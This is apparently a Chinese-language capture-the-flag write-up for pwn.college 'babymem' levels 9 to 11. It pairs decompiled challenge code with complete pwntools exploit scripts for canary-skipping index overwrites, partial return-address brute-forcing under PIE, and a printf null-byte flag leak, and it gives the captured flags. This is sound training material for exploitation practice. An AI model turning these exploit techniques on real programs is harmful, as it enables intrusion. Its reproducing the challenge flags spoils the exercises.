21
        context.binary = elf
22

23
        if debug:
24
            return gdb.debug(
25
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
26
            )
27
        else:
28
            return process([elf.path] + (argv or []), env=envp)
29
    else:
30
        return remote(HOST, PORT)
31

32

33
null = b"\x00"
34
padding = b"".ljust(0x68 - 0x1, b"A")
35
fixed_offset = b"\x5a"
36
possible_bytes = [bytes([i]) for i in range(0x0F, 0x10F, 0x10)]
37

38

39
def send_payload(target, payload):
40
    try:
41
        payload_size = f"{len(payload)}".encode()
42
        target.recvuntil(b"Payload size: ")
43
        target.sendline(payload_size)
44
        target.recvuntil(b"Send your payload")
45
        target.send(payload)
46

47
        response = target.recvall()
48

49
        return b"You win!" in response
50
    except Exception as e:
51
        log.exception(f"An error occurred: {e}")
52

53

54
while True:
55
    try:
56
        target = launch(debug=False)
57

58
        payload = null + padding
59
        payload += fixed_offset + random.choice(possible_bytes)
60
        log.info(f"Trying payload: {payload.hex()}")
61

62
        if send_payload(target, payload):
63
            log.success("Success! Exiting...")
64

65
            pause()
66
            exit()
67
    except Exception as e:
68
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{orn4FN_Dc8Po8bG2OX-G3dcj8Pr.0FNwMDL5cTNxgzW}

Level 9.0

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a PIE binary with a stack canary. Be warned, this requires careful and clever payload construction!

Write-up


8 collapsed lines
1
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
2
{
3
  int v3; // eax
4
  int *v4; // rax
5
  char *v5; // rax
6
  _QWORD v7[3]; // [rsp+0h] [rbp-80h] BYREF
7
  int v8; // [rsp+1Ch] [rbp-64h]
8
  int v9; // [rsp+24h] [rbp-5Ch]
9
  unsigned __int64 v10; // [rsp+28h] [rbp-58h] BYREF
10
  char *v11; // [rsp+30h] [rbp-50h]
11
  int *v12; // [rsp+38h] [rbp-48h]
12
  _QWORD v13[6]; // [rsp+40h] [rbp-40h] BYREF
13
  int v14; // [rsp+70h] [rbp-10h] BYREF
14
  unsigned __int64 v15; // [rsp+78h] [rbp-8h]
15
  __int64 savedregs; // [rsp+80h] [rbp+0h] BYREF
16
  _UNKNOWN *retaddr; // [rsp+88h] [rbp+8h] BYREF
3 collapsed lines
17

18
  v8 = a1;
19
  v7[2] = a2;
20
  v7[1] = a3;
21
  v15 = __readfsqword(0x28u);
22
  memset(v13, 0, sizeof(v13));
23
  v14 = 0;
24
  v11 = (char *)v13;
25
  v12 = &v14;
26
  v10 = 0LL;
27
  puts("The challenge() function has just been launched!");
28
  sp_ = (__int64)v7;
57 collapsed lines
29
  bp_ = (__int64)&savedregs;
30
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v7) >> 3) + 2;
31
  rp_ = (__int64)&retaddr;
32
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
33
  DUMP_STACK(sp_, sz_);
34
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
35
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
36
  puts("including the saved base pointer and the saved return address, for a");
37
  printf("total of %d bytes.\n", 8 * sz_);
38
  printf("The input buffer begins at %p, partway through the stack frame,\n", v11);
39
  puts("(\"above\" it in the stack are other local variables used by the function).");
40
  puts("Your input will be read into this buffer.");
41
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 48);
42
  puts("large input length, and thus overflow the buffer.\n");
43
  puts("In this level, there is no \"win\" variable.");
44
  puts("You will need to force the program to execute the win_authed() function");
45
  puts("by directly overflowing into the stored return address back to main,");
46
  printf(
47
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
48
    (const void *)rp_,
49
    rp_ - (_DWORD)v11);
50
  printf(
51
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
52
    rp_ - (_DWORD)v11 + 8,
53
    48);
54
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)v11 - 48);
55
  puts("and 8 that will overwrite the return address).\n");
56
  cp_ = bp_;
57
  cv_ = __readfsqword(0x28u);
58
  while ( *(_QWORD *)cp_ != cv_ )
59
    cp_ -= 8LL;
60
  puts("While canaries are enabled, this program reads your input 1 byte at a time,");
61
  puts("tracking how many bytes have been read and the offset from your input buffer");
62
  puts("to read the byte to using a local variable on the stack.");
63
  puts("The code for doing this looks something like:");
64
  puts("    while (n < size) {");
65
  puts("      n += read(0, input + n, 1);");
66
  puts("    }");
67
  puts("As it turns out, you can use this local variable `n` to jump over the canary.");
68
  printf("Your input buffer is stored at %p, and this local variable `n`\n", v11);
69
  printf("is stored %d bytes after it at %p.\n\n", (_DWORD)v12 - (_DWORD)v11, v12);
70
  puts("When you overwrite `n`, you will change the program's understanding of");
71
  puts("how many bytes it has read in so far, and when it runs `read(0, input + n, 1)`");
72
  puts("again, it will read into an offset that you control.");
73
  puts("This will allow you to reposition the write *after* the canary, and write");
74
  puts("into the return address!\n");
75
  puts("The payload size is deceptively simple.");
76
  puts("You don't have to think about how many bytes you will end up skipping:");
77
  puts("with the while loop described above, the payload size marks the");
78
  puts("*right-most* byte that will be read into.");
79
  puts("As far as this challenge is concerned, there is no difference between bytes");
80
  puts("\"skipped\" by fiddling with `n` and bytes read in normally: the values");
81
  puts("of `n` and `size` are all that matters to determine when to stop reading,");
82
  puts("*not* the number of bytes actually read in.\n");
83
  puts("That being said, you *do* need to be careful on the sending side: don't send");
84
  puts("the bytes that you're effectively skipping!\n");
85
  puts("Because the binary is position independent, you cannot know");
86
  puts("exactly where the win_authed() function is located.");
87
  puts("This means that it is not clear what should be written into the return address.\n");
88
  printf("Payload size: ");
89
  __isoc99_scanf("%lu", &v10);
90
  printf("You have chosen to send %lu bytes of input!\n", v10);
91
  printf("This will allow you to write from %p (the start of the input buffer)\n", v11);
92
  printf("right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", &v11[v10], v10 - 48);
38 collapsed lines
93
  printf("Of these, you will overwrite %d bytes into the return address.\n", v10 + (_DWORD)v11 - rp_);
94
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
95
  puts("Overwriting the entire return address is fine when we know");
96
  puts("the whole address, but here, we only really know the last three nibbles.");
97
  puts("These nibbles never change, because pages are aligned to 0x1000.");
98
  puts("This gives us a workaround: we can overwrite the least significant byte");
99
  puts("of the saved return address, which we can know from debugging the binary,");
100
  puts("to retarget the return to main to any instruction that shares the other 7 bytes.");
101
  puts("Since that last byte will be constant between executions (due to page alignment),");
102
  puts("this will always work.");
103
  puts("If the address we want to redirect execution to is a bit farther away from");
104
  puts("the saved return address, and we need to write two bytes, then one of those");
105
  puts("nibbles (the fourth least-significant one) will be a guess, and it will be");
106
  puts("incorrect 15 of 16 times.");
107
  puts("This is okay: we can just run our exploit a few times until it works");
108
  puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times).");
109
  puts("One caveat in this challenge is that the win_authed() function must first auth:");
110
  puts("it only lets you win if you provide it with the argument 0x1337.");
111
  puts("Speifically, the win_authed() function looks something like:");
112
  puts("    void win_authed(int token)");
113
  puts("    {");
114
  puts("      if (token != 0x1337) return;");
115
  puts("      puts(\"You win! Here is your flag: \");");
116
  puts("      sendfile(1, open(\"/flag\", 0), 0, 256);");
117
  puts("      puts(\"\");");
118
  puts("    }");
119
  puts(byte_440D);
120
  puts("So how do you pass the check? There *is* a way, and we will cover it later,");
121
  puts("but for now, we will simply bypass it! You can overwrite the return address");
122
  puts("with *any* value (as long as it points to executable code), not just the start");
123
  puts("of functions. Let's overwrite past the token check in win!\n");
124
  puts("To do this, we will need to analyze the program with objdump, identify where");
125
  puts("the check is in the win_authed() function, find the address right after the check,");
126
  puts("and write that address over the saved return address.\n");
127
  puts("Go ahead and find this address now. When you're ready, input a buffer overflow");
128
  printf(
129
    "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n",
130
    (const void *)rp_,
131
    rp_ - (_DWORD)v11);
132
  puts("with the correct value.\n");
133
  printf("Send your payload (up to %lu bytes)!\n", v10);
134
  while ( *v12 < v10 )
135
  {
136
    printf("About to read 1 byte to %p, this is %d bytes away from the start of the input buffer.\n", &v11[*v12], *v12);
137
    v3 = read(0, &v11[*v12], 1uLL);
138
    *v12 += v3;
139
  }
140
  v9 = *v12;
141
  if ( v9 < 0 )
142
  {
32 collapsed lines
143
    v4 = __errno_location();
144
    v5 = strerror(*v4);
145
    printf("ERROR: Failed to read input -- %s!\n", v5);
146
    exit(1);
147
  }
148
  printf("You sent %d bytes!\n", v9);
149
  puts("Let's see what happened with the stack:\n");
150
  DUMP_STACK(sp_, sz_);
151
  puts("The program's memory status:");
152
  printf("- the input buffer starts at %p\n", v11);
153
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
154
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
155
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
156
  printf("- the canary is stored at %p.\n", (const void *)cp_);
157
  printf("- the canary value is now %p.\n", *(const void **)cp_);
158
  printf("- the address of the number of bytes read counter and read offset is %p.\n", v12);
159
  printf("- the address of win_authed() is %p.\n", win_authed);
160
  putchar(10);
161
  puts("If you have managed to overwrite the return address with the correct value,");
162
  puts("challenge() will jump straight to win_authed() when it returns.");
163
  printf("Let's try it now!\n\n");
164
  if ( (unsigned __int64)&v11[v9] > rp_ + 2 )
165
  {
166
    puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address.");
167
    puts("         This can still work, because I told you the correct address to use for");
168
    puts("         this execution, but you should not rely on that information.");
169
    puts("         You can solve this challenge by only overwriting two bytes!");
170
    puts("         ");
171
  }
172
  puts("Goodbye!");
173
  return 0LL;
174
}

这题的漏洞在于没有对数组索引做是否超出数组容量的判断，导致可以通过数组越界在任意内存处写入数据。

1
while ( *v12 < v10 )
2
{
3
  printf("About to read 1 byte to %p, this is %d bytes away from the start of the input buffer.\n", &v11[*v12], *v12);
4
  v3 = read(0, &v11[*v12], 1uLL);
5
  *v12 += v3;
6
}

我们知道 v10 是我们提供的任意大小。程序内部通过一个 while 循环从零开始向 v13 数组读入数据，一次一字节，每次写完后将 *v12 加上本次读入字节数，也就是加一，以此指向下一个内存单元。这个过程一共写 v10 次。

由于读入数据的实现是 read(0, &v11[*v12], 1uLL)，这会将一个字节读到 &v11[*v12] 这个地址。*v12 是从零开始的索引，v11 保存的是输入缓冲区的起始地址。

如果我们将输入缓冲区填满，再多写入一个字节就会覆盖索引 *v12 的值。如果我们把索引设为我们想写入的位置，就实现了任意位置写。因此这里我们只需要计算要覆盖的返回地址和输入缓冲区起始位置之间的距离即可，用这个距离覆盖索引值来修改返回地址。

不过根据程序逻辑，我们是先判断 *v12 < v10 是否成立，成立则读入一个字节到 &v11[*v12]，然后将 *v12 加一，回到判断，如果还是小于 v10 就再读入一个字节到指定位置。因此我们计算出输入缓冲区起始位置到返回地址之间的距离后应该将其减一，用这个值来覆盖索引值，这样才能做到下一次读入的位置是我们想覆盖的目标地址。

这个程序是开启了 Canary 和 PIE 保护的，不过因为数组越界写的漏洞存在，我们可以直接跳过 Canary 覆盖返回地址。因为有 PIE，而我们通过页偏移的方式定位要执行的指令，所以我们最后只需要两个字节来覆盖返回地址。这里需要注意的是，payload 结构是用来填充数组的 padding + 用来重定位写入索引的一字节 + 用来重定位执行流的两字节页偏移。如果我们将这个 payload 大小作为 v10 的话，得到的可输入大小是数组大小加三，但是我们的返回地址肯定在一个比较高的位置，导致 *v12 < v10 这条检测失败，不会去覆盖返回地址。所以为了绕过这个判断，我们实际需要的输入大小应该是用来重定位写入的索引的值加三，那这不够的大小就需要我们通过在 payload 末尾再加一段 padding 实现。当然你也可以手动指定最大输入大小就是了…

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, log, pause, process, random, remote, gdb
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-9-0"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
b *challenge+1786
13
b *challenge+1816
14
b *challenge+1825
15
c
16
"""
17

18

19
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
20
    if local:
21
        elf = ELF(FILE)
22
        context.binary = elf
23

24
        if debug:
25
            return gdb.debug(
26
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
27
            )
28
        else:
29
            return process([elf.path] + (argv or []), env=envp)
30
    else:
31
        return remote(HOST, PORT)
32

33

34
destination = b"\x47"
35
fixed_offset = b"\x84"
36
possible_bytes = [bytes([i]) for i in range(0x06, 0x106, 0x10)]
37
padding = b"".ljust(0x30, b"A") + destination
38
extra_padding = b"".ljust(0x17, b"A")
39

40

41
def send_payload(target, payload):
42
    try:
43
        payload_size = f"{len(payload)}".encode()
44
        target.recvuntil(b"Payload size: ")
45
        target.sendline(payload_size)
46
        target.recvuntil(b"Send your payload")
47
        target.send(payload)
48

49
        response = target.recvall()
50
        # pause()
51

52
        return b"You win!" in response
53
    except Exception as e:
54
        log.exception(f"An error occurred: {e}")
55

56

57
while True:
58
    try:
59
        target = launch(debug=False)
60

61
        payload = padding
62
        payload += fixed_offset + random.choice(possible_bytes)
63
        payload += extra_padding
64
        log.info(f"Trying payload: {payload.hex()}")
65

66
        if send_payload(target, payload):
67
            log.success("Success! Exiting...")
68

69
            pause()
70
            exit()
71
    except Exception as e:
72
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{QccZPJ6VBhlEFtdfJdexxhwYSnh.0VNwMDL5cTNxgzW}

Level 9.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a PIE binary with a stack canary. Be warned, this requires careful and clever payload construction!

Write-up


18 collapsed lines
1
__int64 challenge()
2
{
3
  int v0; // eax
4
  int *v1; // rax
5
  char *v2; // rax
6
  unsigned __int64 v4; // [rsp+28h] [rbp-88h] BYREF
7
  _BYTE *v5; // [rsp+30h] [rbp-80h]
8
  int *v6; // [rsp+38h] [rbp-78h]
9
  _BYTE v7[96]; // [rsp+40h] [rbp-70h] BYREF
10
  int v8; // [rsp+A0h] [rbp-10h] BYREF
11
  unsigned __int64 v9; // [rsp+A8h] [rbp-8h]
12

13
  v9 = __readfsqword(0x28u);
14
  memset(v7, 0, sizeof(v7));
15
  v8 = 0;
16
  v5 = v7;
17
  v6 = &v8;
18
  v4 = 0LL;
19
  printf("Payload size: ");
20
  __isoc99_scanf("%lu", &v4);
21
  printf("Send your payload (up to %lu bytes)!\n", v4);
22
  while ( *v6 < v4 )
23
  {
24
    v0 = read(0, &v5[*v6], 1uLL);
25
    *v6 += v0;
26
  }
27
  if ( *v6 < 0 )
28
  {
29
    v1 = __errno_location();
7 collapsed lines
30
    v2 = strerror(*v1);
31
    printf("ERROR: Failed to read input -- %s!\n", v2);
32
    exit(1);
33
  }
34
  puts("Goodbye!");
35
  return 0LL;
36
}

同上一题一样，自己琢磨去吧……

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, log, pause, process, random, remote, gdb
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-9-1"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
b *challenge+212
13
b *challenge+233
14
c
15
"""
16

17

18
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
19
    if local:
20
        elf = ELF(FILE)
21
        context.binary = elf
22

23
        if debug:
24
            return gdb.debug(
25
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
26
            )
27
        else:
28
            return process([elf.path] + (argv or []), env=envp)
29
    else:
30
        return remote(HOST, PORT)
31

32

33
destination = b"\x77"
34
fixed_offset = b"\xe4"
35
possible_bytes = [bytes([i]) for i in range(0x0F, 0x10F, 0x10)]
36
padding = b"".ljust(0x60, b"A") + destination
37
extra_padding = b"".ljust(0x17, b"A")
38

39

40
def send_payload(target, payload):
41
    try:
42
        payload_size = f"{len(payload)}".encode()
43
        target.recvuntil(b"Payload size: ")
44
        target.sendline(payload_size)
45
        target.recvuntil(b"Send your payload")
46
        target.send(payload)
47

48
        response = target.recvall()
49
        # pause()
50

51
        return b"You win!" in response
52
    except Exception as e:
53
        log.exception(f"An error occurred: {e}")
54

55

56
while True:
57
    try:
58
        target = launch(debug=False)
59

60
        payload = padding
61
        payload += fixed_offset + random.choice(possible_bytes)
62
        payload += extra_padding
63
        log.info(f"Trying payload: {payload.hex()}")
64

65
        if send_payload(target, payload):
66
            log.success("Success! Exiting...")
67

68
            pause()
69
            exit()
70
    except Exception as e:
71
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{QfzSsyMdYf7_dP64EnXQ8DrrgQ1.0lNwMDL5cTNxgzW}

Level 10.0

Information

Category: Pwn

Description

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Write-up


6 collapsed lines
1
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
2
{
3
  int v3; // eax
4
  int *v4; // rax
5
  char *v5; // rax
6
  _QWORD v7[3]; // [rsp+0h] [rbp-170h] BYREF
7
  int v8; // [rsp+1Ch] [rbp-154h]
8
  int v9; // [rsp+24h] [rbp-14Ch]
9
  size_t nbytes; // [rsp+28h] [rbp-148h] BYREF
10
  void *v11; // [rsp+30h] [rbp-140h]
11
  void *buf; // [rsp+38h] [rbp-138h]
12
  _BYTE v13[288]; // [rsp+40h] [rbp-130h] BYREF
13
  int v14; // [rsp+160h] [rbp-10h]
14
  char v15; // [rsp+164h] [rbp-Ch]
15
  unsigned __int64 v16; // [rsp+168h] [rbp-8h]
7 collapsed lines
16
  __int64 savedregs; // [rsp+170h] [rbp+0h] BYREF
17
  _UNKNOWN *retaddr; // [rsp+178h] [rbp+8h] BYREF
18

19
  v8 = a1;
20
  v7[2] = a2;
21
  v7[1] = a3;
22
  v16 = __readfsqword(0x28u);
23
  memset(v13, 0, sizeof(v13));
24
  v14 = 0;
25
  v15 = 0;
26
  v11 = v13;
27
  buf = &v13[37];
28
  nbytes = 0LL;
29
  puts("The challenge() function has just been launched!");
30
  sp_ = (__int64)v7;
13 collapsed lines
31
  bp_ = (__int64)&savedregs;
32
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v7) >> 3) + 2;
33
  rp_ = (__int64)&retaddr;
34
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
35
  DUMP_STACK(sp_, sz_);
36
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
37
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
38
  puts("including the saved base pointer and the saved return address, for a");
39
  printf("total of %d bytes.\n", 8 * sz_);
40
  printf("The input buffer begins at %p, partway through the stack frame,\n", v11);
41
  puts("(\"above\" it in the stack are other local variables used by the function).");
42
  puts("Your input will be read into this buffer.");
43
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 37);
44
  puts("large input length, and thus overflow the buffer.\n");
45
  puts("In this level, the flag will be loaded into memory.");
46
  puts("However, at no point will this program actually print the buffer storing the flag.");
47
  v3 = open("/flag", 0);
48
  read(v3, buf, 0x100uLL);
49
  cp_ = bp_;
50
  cv_ = __readfsqword(0x28u);
51
  while ( *(_QWORD *)cp_ != cv_ )
7 collapsed lines
52
    cp_ -= 8LL;
53
  printf("Payload size: ");
54
  __isoc99_scanf("%lu", &nbytes);
55
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
56
  printf("This will allow you to write from %p (the start of the input buffer)\n", v11);
57
  printf(
58
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
59
    (char *)v11 + nbytes,
60
    nbytes - 37);
61
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
62
  v9 = read(0, v11, nbytes);
63
  if ( v9 < 0 )
64
  {
65
    v4 = __errno_location();
11 collapsed lines
66
    v5 = strerror(*v4);
67
    printf("ERROR: Failed to read input -- %s!\n", v5);
68
    exit(1);
69
  }
70
  printf("You sent %d bytes!\n", v9);
71
  puts("The program's memory status:");
72
  printf("- the input buffer starts at %p\n", v11);
73
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
74
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
75
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
76
  printf("- the canary is stored at %p.\n", (const void *)cp_);
77
  printf("- the canary value is now %p.\n", *(const void **)cp_);
78
  printf("- the address of the flag is %p.\n", buf);
79
  putchar(10);
80
  printf("You said: %s\n", (const char *)v11);
81
  puts("Goodbye!");
82
  return 0LL;
83
}

4755 .rwsr-xr-x 18k root root 12 Dec 21:43 babymem-level-10-0*
0400 .r--------  57 root root 12 Dec 22:13 /flag

通过调试我们发现，read 并不会从 /flag 中读到数据。但由于这是个 SUID 程序，运行的时候会以这个程序的所有者的身份运行，而所有者是 root，那么理应我们可以读取 /flag 才对。这里的问题其实在于内核的保护策略：调试 SUID 程序的时候，Linux 内核会移除 SUID 位，使用当前用户权限调试，以此防止攻击者通过调试器以特权身份执行恶意代码。直接一个 sudo 怼上去看它服不服吧 LMAO。

注意到程序最后使用 printf 将整个 buf 的内容输出。而我们的 flag 在此之前就已经被保存到 buf 中了。所以这里考察的是 printf 在遇到 \x00 后认为字符串结束而中断输出。

所以我们只要使用垃圾值填充到 flag 保存的位置就好了。

~~为什么那么简单……这可是至高的 Level 10！！！~~

Exploit

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, pause, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-10-0"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
b *challenge+507
13
c
14
"""
15

16

17
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
18
    if local:
19
        elf = ELF(FILE)
20
        context.binary = elf
21

22
        if debug:
23
            return gdb.debug(
24
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
25
            )
26
        else:
27
            return process([elf.path] + (argv or []), env=envp)
28
    else:
29
        return remote(HOST, PORT)
30

31

32
padding = b"".ljust(0x25, b"A")
33

34

35
def send_payload(target, payload):
36
    try:
37
        payload_size = f"{len(payload)}".encode()
38
        target.recvuntil(b"Payload size: ")
39
        target.sendline(payload_size)
40
        target.recvuntil(b"Send your payload")
41
        target.send(payload)
42

43
        response = target.recvall()
44

45
        return b"pwn.college{" in response
46
    except Exception as e:
47
        log.exception(f"An error occurred: {e}")
48

49

50
try:
51
    target = launch(debug=False)
52

53
    payload = padding
54

55
    if send_payload(target, payload):
56
        log.success("Success! Exiting...")
57

58
        pause()
59
        exit()
60
except Exception as e:
61
    log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{cHV80jBzHGyTr_qaE0HdorP-81y.01NwMDL5cTNxgzW}

Level 10.1

Information

Category: Pwn

Description

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Write-up

试问这和上一题有何区别……

Exploit

1
#!/usr/bin/python3
2

3
from pwn import ELF, context, gdb, log, pause, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-10-1"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
b *challenge+166
13
c
14
"""
15

16

17
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
18
    if local:
19
        elf = ELF(FILE)
20
        context.binary = elf
21

22
        if debug:
23
            return gdb.debug(
24
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
25
            )
26
        else:
27
            return process([elf.path] + (argv or []), env=envp)
28
    else:
29
        return remote(HOST, PORT)
30

31

32
padding = b"".ljust(0x51, b"A")
33

34

35
def send_payload(target, payload):
36
    try:
37
        payload_size = f"{len(payload)}".encode()
38
        target.recvuntil(b"Payload size: ")
39
        target.sendline(payload_size)
40
        target.recvuntil(b"Send your payload")
41
        target.send(payload)
42

43
        response = target.recvall()
44

45
        return b"pwn.college{" in response
46
    except Exception as e:
47
        log.exception(f"An error occurred: {e}")
48

49

50
try:
51
    target = launch(debug=False)
52

53
    payload = padding
54

55
    if send_payload(target, payload):
56
        log.success("Success! Exiting...")
57

58
        pause()
59
        exit()
60
except Exception as e:
61
    log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{4n50Ii5yzf-WULWGzVOqmN3vTgp.0FOwMDL5cTNxgzW}

Level 11.0

Information

Category: Pwn

Description

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Write-up

和前面两题差不多，考察点都是 SUID 的性质和看能不能想到 printf 判断字符串结束的机制。利用这个机制来泄漏 flag。

和前面两题最大的区别在于这次使用 mmap 函数来映射，或者说分配内存。之前是变量自动分配内存。

mmap 映射成功返回起始地址，失败返回 -1。


6 collapsed lines
1
__int64 challenge()
2
{
3
  int *v0; // rax
4
  char *v1; // rax
5
  int i; // [rsp+2Ch] [rbp-34h]
6
  int fd; // [rsp+30h] [rbp-30h]
7
  int v5; // [rsp+34h] [rbp-2Ch]
8
  size_t nbytes; // [rsp+38h] [rbp-28h] BYREF
9
  void *v7; // [rsp+40h] [rbp-20h]
10
  void *buf; // [rsp+48h] [rbp-18h]
11
  void *v9; // [rsp+50h] [rbp-10h]
12
  void *v10; // [rsp+58h] [rbp-8h]
13

14
  nbytes = 0LL;
4 collapsed lines
15
  puts("The challenge() function has just been launched!");
16
  puts("This challenge stores your input buffer in an mmapped page of memory!");
17
  v7 = mmap(0LL, 0x1000uLL, 3, 34, 0, 0LL);
18
  printf("Called mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0) = %p\n", v7);
19
  puts("In this level, the flag will be loaded into memory.");
20
  puts("However, at no point will this program actually print the buffer storing the flag.");
21
  puts("Mapping memory for the flag...");
22
  buf = mmap(0LL, 0x1000uLL, 3, 34, 0, 0LL);
23
  fd = open("/flag", 0);
24
  read(fd, buf, 0x400uLL);
25
  close(fd);
26
  printf("Called mmap(0, 0x1000, 4, MAP_SHARED, open(\"/flag\", 0), 0) = %p\n", buf);
27
  for ( i = 0; i <= 2; ++i )
2 collapsed lines
28
  {
29
    v10 = mmap(0LL, 0x1000uLL, 3, 34, 0, 0LL);
30
    printf("Called mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0) = %p\n", v10);
31
  }
32
  puts("Memory mapping the input buffer...");
33
  v9 = mmap(0LL, 0x78uLL, 3, 34, 0, 0LL);
34
  printf("Called mmap(0, 120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0) = %p\n", v9);
35
  printf("Payload size: ");
36
  __isoc99_scanf("%lu", &nbytes);
4 collapsed lines
37
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
38
  printf("This will allow you to write from %p (the start of the input buffer)\n", v9);
39
  printf(
40
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
41
    (char *)v9 + nbytes,
42
    nbytes - 120);
43
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
44
  v5 = read(0, v9, nbytes);
45
  if ( v5 < 0 )
46
  {
47
    v0 = __errno_location();
6 collapsed lines
48
    v1 = strerror(*v0);
49
    printf("ERROR: Failed to read input -- %s!\n", v1);
50
    exit(1);
51
  }
52
  printf("You sent %d bytes!\n", v5);
53
  puts("The program's memory status:");
54
  printf("- the input buffer starts at %p\n", v9);
55
  printf("- the address of the flag is %p.\n", buf);
56
  putchar(10);
57
  printf("You said: %s\n", (const char *)v9);
58
  puts("Goodbye!");
59
  return 0LL;
60
}

alr，让我们调试看看需要多大的 padding：

Breakpoint 1, 0x000055e7d6a8cd2a in challenge ()
21 collapsed lines
------- tip of the day (disable with set show-tips off) -------
Pwndbg mirrors some of Windbg commands like eq, ew, ed, eb, es, dq, dw, dd, db, ds for writing and reading memory
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0x1f
 RBX  0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
 RCX  0x22
 RDX  3
 RDI  0
 RSI  0x1000
 R8   0
 R9   0
 R10  0
 R11  0x202
 R12  1
 R13  0
 R14  0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0
 RSP  0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
 RIP  0x55e7d6a8cd2a (challenge+188) ◂— call 0x55e7d6a8c150
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x55e7d6a8cd2a <challenge+188>    call   mmap@plt                    <mmap@plt>
        addr: 0
        len: 0x1000
        prot: 3
        flags: 0x22
        fd: 0 (pipe:[532567])
        offset: 0
28 collapsed lines

   0x55e7d6a8cd2f <challenge+193>    mov    qword ptr [rbp - 0x18], rax
   0x55e7d6a8cd33 <challenge+197>    mov    esi, 0                          ESI => 0
   0x55e7d6a8cd38 <challenge+202>    lea    rdi, [rip + 0x1530]             RDI => 0x55e7d6a8e26f ◂— 0x67616c662f /* '/flag' */
   0x55e7d6a8cd3f <challenge+209>    mov    eax, 0                          EAX => 0
   0x55e7d6a8cd44 <challenge+214>    call   open@plt                    <open@plt>

   0x55e7d6a8cd49 <challenge+219>    mov    dword ptr [rbp - 0x30], eax
